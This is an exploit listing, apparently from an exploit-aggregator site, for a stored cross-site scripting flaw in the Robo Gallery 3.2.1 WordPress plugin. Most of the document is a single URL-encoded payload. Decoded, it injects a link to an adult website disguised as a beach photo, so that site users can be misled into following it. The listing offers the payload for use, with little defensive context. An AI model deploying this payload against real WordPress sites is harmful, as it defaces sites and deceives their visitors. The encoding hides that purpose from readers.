Share
## https://sploitus.com/exploit?id=1337DAY-ID-37927
## Title: WordPress 6.0.1 Plugin-Robo Gallery 3.2.1 XSS-Stored 
## Author: nu11secur1ty
## Vendor: https://wordpress.org/
## Software: https://wordpress.org/plugins/robo-gallery/
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/RoboGallery/XSS-Stored


## Description:
The malicious editor of the system can inject a code into the posting form of the plugin Robo Gallery 3.2.1 
by using the XSS-Sored vulnerability and can trick all users of the systems to navigate to the very dangerous URLs. 
It depends on the scenario. This vulnerability can be very dangerous.

STATUS: Medium-High

[+] Payloads:

```
%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%74%68%2e%62%69%6e%67%2e%63%6f%6d%2f%74%68%2f%69%64%2f%4f%49%50%2e%6f%69%49%59%72%68%59%37%38%69%37%67%72%4b%35%32%5a%6f%48%73%4a%41%48%61%45%48%3f%70%69%64%3d%49%6d%67%44%65%74%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/RoboGallery/XSS-Stored)

## Proof and Exploit:
[href](https://streamable.com/56azaa)